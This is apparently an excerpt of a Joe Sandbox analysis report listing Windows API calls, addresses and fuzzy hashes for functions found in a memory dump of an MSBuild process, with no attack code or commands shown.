                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004144E7
                                                                                                                                                                                      • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                      • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                                                    • memset.MSVCRT ref: 0041451A
                                                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1127616056-0
                                                                                                                                                                                    • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                    • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,74DEDF80,?,0041755F,?), ref: 00417478
                                                                                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                                                                                                    • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                                                                                                    • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$DialogHandleModuleParam
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1386444988-0
                                                                                                                                                                                    • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                                                                                                    • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F79E
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040F7AC
                                                                                                                                                                                      • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                                                                                                                                      • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcschr$memcpywcslen
                                                                                                                                                                                    • String ID: "
                                                                                                                                                                                    • API String ID: 1983396471-123907689
                                                                                                                                                                                    • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                    • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                                                                                                                                    • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemcpy
                                                                                                                                                                                    • String ID: %2.2X
                                                                                                                                                                                    • API String ID: 2789212964-323797159
                                                                                                                                                                                    • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                    • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                                                                                                                                    • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E770
                                                                                                                                                                                    • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSendmemset
                                                                                                                                                                                    • String ID: F^@
                                                                                                                                                                                    • API String ID: 568519121-3652327722
                                                                                                                                                                                    • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                    • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                                                                                                                                    • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                                                                                                                                    • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: PlacementWindowmemset
                                                                                                                                                                                    • String ID: WinPos
                                                                                                                                                                                    • API String ID: 4036792311-2823255486
                                                                                                                                                                                    • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                    • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@$memset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1860491036-0
                                                                                                                                                                                    • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                    • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                    • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                    • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                                                                                    • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                    • free.MSVCRT ref: 0040B201
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040B224
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 726966127-0
                                                                                                                                                                                    • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                    • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                    • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                      • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                      • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                      • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                    • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3669619086-0
                                                                                                                                                                                    • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                    • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                                                                                                                                    • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417407
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                                                                                    • free.MSVCRT ref: 00417425
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                    • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5